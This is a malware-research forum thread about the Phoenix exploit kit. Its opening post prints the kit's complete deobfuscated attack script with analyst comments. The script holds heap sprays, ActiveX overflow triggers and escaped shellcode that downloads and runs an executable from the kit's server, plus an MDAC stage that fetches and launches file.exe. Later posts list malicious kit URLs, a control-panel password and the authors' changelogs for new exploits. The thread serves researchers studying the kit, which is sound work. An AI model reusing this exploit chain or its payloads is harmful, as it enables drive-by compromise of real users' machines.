
Malware Related => Malware Analysis => Topic started by: WIEx on September 15, 2009, 06:27:29 pm

Title: Phoenix exploit's kit
Post by: WIEx on September 15, 2009, 06:27:29 pm
Description

http://translate.google.ru/translate?prev=hp&hl=ru&js=y&u=http%3A%2F%2Fwww.hack-info.ru%2Fshowthread.php%3Fp%3D311312&sl=auto&tl=en&history_state0=

Screenshot

(http://img182.imageshack.us/img182/9150/1111n.png)

Control panel

http://www.stiggba.com/phoenix/statistics.php
Exploits

http://www.stiggba.com/phoenix/index.php

deobfuscated script

// Exploit stage aimed at an AOL/Winamp "AmpX" ActiveX control: the variable name
// and the aol.com codebase are the only hints to the product on this page, the
// CLSID itself is not otherwise identified here.
// Analyst notes: the classid string, the codebase URL and the 0x0c0c filler are
// usable as indicators. This stage only runs once every earlier stage in the
// chain (MDAC -> SWF -> PDF -> SNAP -> FLASH10) has thrown or bailed out.
function AOL()
{
    try
    {
        var IWinAmpActiveX = document.createElement('object');
        IWinAmpActiveX.classid = 'clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6';
        IWinAmpActiveX.codebase = "http://pdl.stream.aol.com/downloads/aol/unagi/ampx_en_dl.cab";
        // Payload encoded as %u-escaped 16-bit little-endian words. Decoding the
        // tail of the blob yields readable ASCII: the API names GetTempPathA,
        // LoadLibraryA, GetProcAddress, WinExec, URLMON.DLL, URLDownloadToFileA,
        // the file names pdfupd.exe and crash.php, and the download URL
        // http://stiggba.com/phoenix/load.php?i=17 (same host as MDAC() and SNAP()).
        // `shellcode` is assigned without `var`, so it becomes an implicit global.
        // The literal is broken across two lines here; that is an artefact of how
        // the listing was pasted into the forum, not valid JavaScript.
        shellcode = unescape("%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u732f%u6974%u6767%u6162%u632e%u6d6f%u702f%u6f68%u6e65%u
7869%u6c2f%u616f%u2e64%u6870%u3f70%u3d69%u3731%u9000");
        // Heap-spray layout: a 0x0c0c filler string is doubled until it covers the
        // 20-character header plus the payload, a fill block of that size is cut
        // off, the remainder is grown to just under 0x40000 characters, and 666
        // copies of filler + payload are kept alive in `memory`. All of
        // bigblock/headersize/slackspace/fillblock/block/memory/i are implicit
        // globals (no `var`).
        bigblock = unescape("%u0c0c%u0c0c");
        headersize = 20;
        slackspace = headersize + shellcode.length;
        while (bigblock.length < slackspace) {
            bigblock += bigblock;
        }
        fillblock = bigblock.substring(0, slackspace);
        block = bigblock.substring(0, bigblock.length - slackspace);
        while (block.length + slackspace < 0x40000) {
            block = block + block + fillblock;
        }
        memory = new Array();
        for (i = 0; i < 666; i++) {
            memory[i] = block + shellcode;
        }
        // Trigger argument for ConvertFile: 1400 0xff characters followed by
        // 1000 0x0c characters. `bof` is declared but never initialised, so the
        // first `+=` stringifies `undefined` and the buffer as posted actually
        // begins with the text "undefined".
        var bof;
        for (i = 0; i < 1400; i++) {
            bof = bof + unescape("%ff");
        }
        for (i = 0; i < 1000; i++) {
            bof = bof + unescape("%0c");
        }
        // The same call is issued four times with identical arguments.
        IWinAmpActiveX.ConvertFile(bof, 1, 1, 1, 1, 1);
        IWinAmpActiveX.ConvertFile(bof, 1, 1, 1, 1, 1);
        IWinAmpActiveX.ConvertFile(bof, 1, 1, 1, 1, 1);
        IWinAmpActiveX.ConvertFile(bof, 1, 1, 1, 1, 1);
    }
    catch (e) {
        // Final fallbacks of the chain: the Java applet stage immediately, then
        // DSHOW() after 3 s (scheduled through a string argument to setTimeout,
        // i.e. an implicit eval).
        JAVA();
        setTimeout('DSHOW()', 3000);
    }
}
// Exploit stage for two specific Flash Player 10 builds, selected by exact
// match on the `$version` string; any other version, and any failure to query
// the control, falls through to AOL().
function FLASH10()
{
    try
    {
        // `sv` is assigned without `var` (implicit global, also written by SWF()
        // and PDF()).
        sv = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.10').GetVariable('$version');
        if ((sv == 'WIN 10,0,12,36') || (sv == 'WIN 10,0,22,87'))
        {
            // Loads files/10.swf from the kit directory inside an 18x18 iframe;
            // the relative path and the odd iframe size are usable indicators.
            var swf = document.createElement('iframe');
            swf.setAttribute('src', 'files/10.swf');
            swf.setAttribute('width', 18);
            swf.setAttribute('height', 18);
            document.body.appendChild(swf);
            var memory;
            // Heap spray with a 0x0808 filler. `SC` is the same escaped payload as
            // in AOL() apart from the trailing query value (decodes to
            // ...load.php?i=18). The literal is broken across two lines here
            // (forum paste artefact, not valid JavaScript).
            var nop = unescape('%u0808%u0808');
            var SC = unescape('%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u732f%u6974%u6767%u6162%u632e%u6d6f%u702f%u6f68%u6e65%
u7869%u6c2f%u616f%u2e64%u6870%u3f70%u3d69%u3831%u9000');
            // Pad the filler past 0x10000/2 characters, then trim it so that
            // filler + payload is exactly 0x10000/2 characters, and keep 0x600
            // copies alive. `ass8995` is an implicit global loop index.
            while (nop.length <= 0x10000 / 2) {
                nop += nop;
            }
            nop = nop.substring(0, 0x10000 / 2 - SC.length);
            memory = new Array();
            for (ass8995 = 0; ass8995 < 0x600; ass8995++) {
                memory[ass8995] = nop + SC;
            }
        }
        else {
            AOL();
        }
    }
    catch (e) {
        // Reached when the Flash 10 control is absent or GetVariable fails.
        AOL();
    }
}
// Exploit stage built around the object CLSID below. The function name suggests a
// DirectShow component, but nothing on this page confirms the product. It is only
// ever scheduled from AOL()'s catch block via setTimeout.
function DSHOW()
{
    // Same escaped payload as AOL()/FLASH10() apart from the trailing query value
    // (decodes to ...load.php?i=10). Broken across two lines in this listing
    // (forum paste artefact, not valid JavaScript).
    var b = unescape('%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u732f%u6974%u6767%u6162%u632e%u6d6f%u702f%u6f68%u6e65%u7869%u6c
2f%u616f%u2e64%u6870%u3f70%u3d69%u3031%u9000');
    // Heap spray with a 0x9090 filler (0x90 is the x86 NOP byte): same header /
    // fill-block / grow scheme as AOL(), but grown to just under 0x70000
    // characters and kept alive in 350 copies.
    var c = unescape('%u9090%u9090');
    var d = 20;
    var e = d + b.length;
    while (c.length < e) {
        c += c;
    }
    var f = c.substring(0, e);
    var g = c.substring(0, c.length - e);
    while (g.length + e < 0x70000) {
        g = g + g + f;
    }
    var h = new Array();
    // `i` here is the hoisted local declared a few lines down, so this loop does
    // not leak a global; the same name is then reused for the object element.
    for (i = 0; i < 350; i++) {
        h[i] = g + b
    }
    var i = document.createElement('object');
    // `j` is not defined anywhere in this listing; unless the hosting page
    // supplies it (e.g. an element with that id), this call throws a
    // ReferenceError and the property writes below never run as posted.
    j.appendChild(i);
    i.width = '1';
    i.height = '1';
    i.data = './img.png';
    i.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
}
// First stage of the chain (invoked at the bottom of the listing). The function
// name suggests the MDAC RDS.DataSpace control; the CLSID is not otherwise
// identified on this page.
// Analyst notes: a synchronous GET to http://stiggba.com/phoenix/load.php?i=1,
// the response body written to './/..//file.exe' through ADODB.Stream, then
// launched with Shell.Application.ShellExecute. Every failure path falls back
// to SWF().
function MDAC()
{
    var p = document.createElement('object');
    // Sets the id attribute to the element object itself (stringified), not to
    // a name; harmless for the rest of the function.
    p.setAttribute('id', p);
    p.setAttribute('classid', 'clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
    try
    {
        // CreateObject on the control is what instantiates the three COM objects
        // below; if the control is absent or blocked this throws and the outer
        // catch runs.
        var q = p.CreateObject('msxml2.XMLHTTP', '');
        var r = p.CreateObject('Shell.Application', '');
        var s = p.CreateObject('adodb.stream', '');
        try
        {
            s.type = 1;   // ADODB adTypeBinary
            q.open('GET', 'http://stiggba.com/phoenix/load.php?i=1', false);   // synchronous request
            q.send();
            s.open();
            s.Write(q.responseBody);
            // `var t` is hoisted to function scope, so it is still visible in the
            // second try block below.
            var t = './/..//file.exe';
            s.SaveToFile(t, 2);   // 2 = adSaveCreateOverWrite
            s.Close();
        }
        catch (e) {
            SWF();
        }
        try {
            r.shellexecute(t);
        }
        catch (e) {
            SWF();
        }
    }
    catch (e) {
        SWF();
    }
}
// Exploit stage for the Snapshot Viewer control (ProgID below). The drive-letter
// probe in var1() exists because the stage needs to know where Outlook Express
// (and with it wab.exe) is installed.
function SNAP()
{
    // Probes drive letters by loading
    // res://<letter>:\Program Files\Outlook Express\msoeres.dll/#2/1 as an image
    // and treating a 59-pixel-high result as "found". The loop runs
    // String.fromCharCode(65 + 2 .. 65 + 26), i.e. 'C' through 'Z' and finally
    // '[', so a return value of '[' means no drive matched. `var2` and `var3`
    // are implicit globals. (res:// probing of local files like this is itself a
    // useful detection signal.)
    function var1()
    {
        for (var2 = 2, var3 = ''; var2 <= 26; var2++)
        {
            var3 = String.fromCharCode(65 + var2);
            var var4 = new Image();
            var4.src = 'res://' + var3 + ':\\' + 'Program Files' + '\\' + 'Outlook Express' + '\\' + 'msoeres.dll' + '/#2/1';
            if (var4.height == 59) {
                break;
            }
            var4 = '';
        }
        return var3;
    }
    // url: the remote resource handed to the control as SnapshotPath
    // (the load.php?i=2 URL passed at the bottom of SNAP()).
    function var5(url)
    {
        var var3 = var1();
        if (var3 == '[') {
            FLASH10();   // no Outlook Express install found, skip this stage
            return;
        }
        try {
            var var6 = new ActiveXObject('snpvw.Snapshot Viewer Control.1');
        }
        catch (e) {
            // The assignment threw, so var6 is undefined here and this
            // comparison is always true: the catch always falls back to FLASH10().
            if (var6 != '[object]') {
                FLASH10();
                return;
            }
        }
        // The property names suggest SnapshotPath is the remote source and
        // CompressedPath the local destination, i.e. the control is being pointed
        // at wab.exe as the output path; that reading is inferred from the names,
        // the control's semantics are not shown on this page.
        var6.SnapshotPath = url;
        try
        {
            var6.CompressedPath = var3 + ':\\' + 'Program Files' + '\\' + 'Outlook Express' + '\\' + 'wab.exe';
            var6.PrintSnapshot();
        }
        catch (e) {
            FLASH10();
        };
        // Polls every 3 s until the control reports readyState 4, then navigates
        // to 'ldap://' -- presumably so the browser hands the ldap: scheme to the
        // system handler (wab.exe); that association is inferred, not shown here.
        var var7 = setInterval(function ()
        {
            if (var6.readyState == 4) {
                clearInterval(var7);
                window.location = 'ldap://';
            }
        }, 3000);
    }
    var5('http://stiggba.com/phoenix/load.php?i=2');
}
// Exploit stage for six specific Flash Player 9 builds, selected by exact match
// on the `$version` string. Any other version, or any failure to query the
// control, falls through to PDF(). Called from every failure path in MDAC().
function SWF()
{
    try
    {
        // `sv` is an implicit global (no `var`), also written by FLASH10()/PDF().
        sv = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.9').GetVariable('$version');
        if ((sv == 'WIN 9,0,115,0') || (sv == 'WIN 9,0,16,0') || (sv == 'WIN 9,0,28,0') || (sv == 'WIN 9,0,45,0') || (sv == 'WIN 9,0,47,0') || (sv == 'WIN 9,0,64,0'))
        {
            // Loads files/9i.swf from the kit directory in a 1x1 iframe; the
            // relative path and the 1x1 size are usable indicators.
            var swf = document.createElement("iframe");
            swf.setAttribute("src", "files/9i.swf");
            swf.setAttribute("width", 1);
            swf.setAttribute("height", 1);
            document.body.appendChild(swf);
        }
        else {
            PDF();
        }
    }
    catch (e) {
        PDF();
    }
}
// Java applet stage: writes an <applet> tag that loads Show.class from the same
// directory as the landing page. The tag is never closed in this listing and
// the class file itself is not part of this page. Called from AOL()'s catch.
function JAVA()
{
    document.write("<applet code = 'Show.class' width='100' height='100'>");
}
// Navigates the top-most window to `fn` (a PDF path under files/, see PDF()),
// walking up through `parent` so the redirect escapes any iframe the landing
// page was loaded in. `wind` is an implicit global (no `var`).
function SHOWPDF(fn)
{
    wind = window;
    while (wind.parent != wind) {
        wind = wind.parent;
    }
    wind.location = fn;
}
// Adobe Reader stage: writes an <OBJECT> with the CLSID below, reads the version
// reported by its GetVersions() and picks one of three PDF files accordingly;
// anything else (including a missing control) falls through to SNAP().
// The function name and the GetVersions() call are the only evidence on this
// page that the CLSID belongs to the Reader control.
function PDF()
{
    try
    {
        document.write('<OBJECT id=Pdf1 height=0 width=0 classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></OBJECT>');
        // `Pdf1` is resolved through the browser exposing the element by its id
        // as a global (IE behaviour). GetVersions() is treated as a comma-separated
        // list whose fifth entry has the form name=version; `lv` ends up as the
        // version string (e.g. "9.0.0") and `sv` (implicit global) as its major
        // component, compared numerically below via string-to-number coercion.
        var lv = Pdf1.GetVersions();
        lv = lv.split(',');
        lv = lv[4].split('=');
        lv = lv[1];
        sv = lv.split('.');
        sv = sv[0];
        if ((lv == '9.0.0') || (lv == '8.1.2')) {
            SHOWPDF('files/geticon.pdf');
        }
        // Note there is no `else` between the two checks: for 9.0.0 the major
        // version is 9, so SNAP() runs as well; for 8.1.2 collab.pdf is loaded
        // after geticon.pdf (each SHOWPDF() call replaces the previous navigation).
        if ( (sv <= 8) && (sv >= 6) ) {
            if (lv == '7.1.0') {
                SHOWPDF('files/printf.pdf');
            }
            else {
                SHOWPDF('files/collab.pdf');
            }
        }
        else {
            SNAP();
        }
    }
    catch (e) {
        SNAP();
    }
}
// Entry point. The stages chain through their catch/else branches, so the
// effective order as posted is MDAC -> SWF -> PDF -> SNAP -> FLASH10 -> AOL ->
// JAVA (+ DSHOW after 3 s); each later stage only runs when the earlier one
// failed or found no matching version.
MDAC();

/EDIT by SysAdMini: Wepawet link added
http://wepawet.cs.ucsb.edu/view.php?hash=0299f11465b1f9188d9ed2fe5b4841a1&type=js
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on September 16, 2009, 07:07:06 am
lifecounter.cn/p/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=de0bcbf8b53f7532de90f0ee6eb95f98&t=1253084633&type=js


stikkso.com/phoenix/index.php
http://wepawet.cs.ucsb.edu/view.php?type=js&hash=052c3e415ac356510424f2f36edb12f7&t=1248796478
Title: Re: Phoenix exploit's kit
Post by: WIEx on September 16, 2009, 01:24:59 pm
SysAdMini,  ;)

Control Panel

Quote
stikkso.com/phoenix/statistics.php

password - parrot
Title: Re: Phoenix exploit's kit
Post by: h4h4h4h4 on September 16, 2009, 05:04:23 pm
SysAdMini,  ;)

Control Panel

Quote
stikkso.com/phoenix/statistics.php

password - parrot

That's cool.  Why would they be so stupid not to change their password?  I'm guessing that's the default password.  Looks like we could go in and reset their stats and mess it up if we wanted to LOL.
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on September 16, 2009, 05:18:13 pm
That's cool.  Why would they be so stupid not to change their password?  I'm guessing that's the default password.  Looks like we could go in and reset their stats and mess it up if we wanted to LOL.

Please don't reset any stats. Stats are interesting for researchers.
Title: Re: Phoenix exploit's kit
Post by: h4h4h4h4 on September 16, 2009, 09:32:52 pm
That's cool.  Why would they be so stupid not to change their password?  I'm guessing that's the default password.  Looks like we could go in and reset their stats and mess it up if we wanted to LOL.

Please don't reset any stats. Stats are interesting for researchers.

Yep sounds good.
Title: Re: Phoenix exploit's kit
Post by: cronos713 on October 24, 2009, 01:43:44 am
More information on my blog ;)
http://mipistus.blogspot.com/2009/09/phoenix-exploits-kit-otra-alternativa.html

and in English
http://evilfingers.blogspot.com/2009/09/phoenix-exploits-kit-another.html
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on August 04, 2010, 06:15:46 am
Phoenix Exploit Kit 2.0
http://www.m86security.com/labs/traceitem.asp?article=1427
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on August 18, 2010, 06:37:57 pm
State of the art in Phoenix Exploit's Kit

http://malwareint.blogspot.com/2010/08/state-of-art-in-phoenix-exploits-kit.html

http://www.malwareint.com/docs/pek-analysis-en.pdf
Title: Re: Phoenix exploit's kit
Post by: detro on August 24, 2010, 04:02:42 pm
Current Phoenix exploit kit campaigns being pushed today,

hxxp://nevoex65eo.com/ab/tmp/des.jar < I have so far been unable to locate the control panel or the payload, but here is the Java sploit

 and

hxxp://79.135.152.217/a/tmp/des.jar which is currently already listed on MDL here http://www.malwaredomainlist.com/mdl.php?search=79.135.152.217&colsearch=All&quantity=50

It appears these are going out in tandem, as I am seeing them appear on multiple different client networks simultaneously.


The t's in "http" have been converted to x's to protect the innocent.
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on September 03, 2010, 09:06:51 pm
Phoenix Exploit Kit's Random Access Obfuscation
http://community.websense.com/blogs/securitylabs/archive/2010/08/31/random-access-obfuscation.aspx
Title: Re: Phoenix exploit's kit
Post by: crunchtime on September 07, 2010, 03:35:10 am
Yet another libtiff.pdf sample from this kit:

hxxtp://ethdem.com/ddt/tmp/libtiff.pdf

Some info on this domain is already on list: http://www.malwaredomainlist.com/mdl.php?search=ethdem.com&colsearch=All&quantity=50

*Edit*
One more: hxxp://www.finworldonline.com/news/tmp/libtiff.pdf
Title: Re: Phoenix exploit's kit
Post by: crunchtime on September 08, 2010, 04:24:16 pm
One more sample:

hxxp://mypetitebusiness.org/2/tmp/libtiff.pdf
Title: Re: Phoenix exploit's kit
Post by: GmG on October 04, 2010, 01:21:56 pm
New phoenix ?
gotrue.cz.cc/tk/

gotrue.cz.cc/tk/u.asx

It is identical to

http://popunder777.com/pek/tmp/u.asx

Title: Re: Phoenix exploit's kit
Post by: pstash on November 17, 2010, 10:33:04 pm
Anyone know where I could find a readme.txt file for this kit?  I have a couple of versions of the kit and want to do some analysis on them.  The readme file in one of the versions is garbled, probably because it was originally written in Russian.
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on December 27, 2010, 08:15:55 pm
Installation Protection Mechanisms of Phoenix Exploit's Kit
http://community.websense.com/blogs/securitylabs/archive/2010/12/27/installation-protection-mechanisms-of-phoenix-exploit-s-kit.aspx?cmpid=sltw
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on February 05, 2011, 04:40:35 pm
Now Exploiting: Phoenix Exploit Kit Version 2.5
http://blog.trendmicro.com/now-exploiting-phoenix-exploit-kit-version-2-5/
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on May 24, 2011, 05:22:41 pm
Version 2.7 announced
http://translate.google.co.jp/translate?js=n&prev=_t&hl=en&ie=UTF-8&layout=2&eotf=1&sl=auto&tl=en&u=http://scriptkiddiesec.blogspot.com/2011/05/phoenix-exploit-27.html

Quote
----------- V2 .7 ------------------------------------

  • Added new exploit JAVA TRUST under JRE / JDK versions 1.6.0, 1.6.0_23
  • Removed all the obsolete and currently detected ("palevnyh") exploits: HCP, FLASH 9, FLASH10, IEPEERS, IE CSS
  • The exploit chain has been rewritten for maximum performance
Title: Re: Phoenix exploit's kit
Post by: GmG on May 24, 2011, 08:10:11 pm
http://wepawet.iseclab.org/view.php?hash=79a210bbed2651d8d5575416c0423dec&t=1303635027&type=js

.cc/27/btfpkrfwcqgvxqdrgp.php

and

http://1160.mosesigses.in/?n=1160
http://sanstag.com/adv/astr/dmxtfzysjq.php

http://urlquery.net/report.php?id=2587
http://wepawet.iseclab.org/view.php?hash=24ee89d61a2041980910ae0580f1e3ed&t=1306268077&type=js
Title: Re: Phoenix exploit's kit
Post by: GmG on June 05, 2011, 05:20:47 pm
Phoenix Exploit Kit (2.7) continues to be updated
http://labs.m86security.com/2011/06/phoenix-exploit-kit-2-7-continues-to-be-updated/
Title: Re: Phoenix exploit's kit
Post by: SysAdMini on May 01, 2012, 06:01:42 pm
Phoenix Exploit's Kit 3.1
http://xylibox.blogspot.de/2012/05/phoenix-exploits-kit-31-full.html

Quote
We are pleased to present new version of pack 3.1!

-----------v3.1------------------------------------

  • Added new JAVA ATOMIC exploit for JRE 1.6.0-1.6.0_30, 1.7.0-1.7.0_2 for FF/IE/OPERA. Significantly increased exploitation success.
  • JAVA TC and JAVA RHINO combined in one .jar file
  • added 4 activation variants:



1)JAVA with version determination, PDF with version determination before load
2)JAVA without version determination, PDF with version determination before load
3)JAVA with version determination, PDF without version determination before load
4)JAVA without version determination, PDF with version determination before load

This flexible system allows traffic sources to survive longer (relevant for iframe traffic) or, conversely, at a small cost in traffic sources, raises exploitation success (relevant for pop-up traffic).

  • The exploit delivery chain has been rewritten to be up to date; JAVA SMB, JAVA TRUST and FLASH 10 have been removed because they are no longer effective. As a consequence, configuration and installation are easier: no Apache on port 8080 and no SMB configs.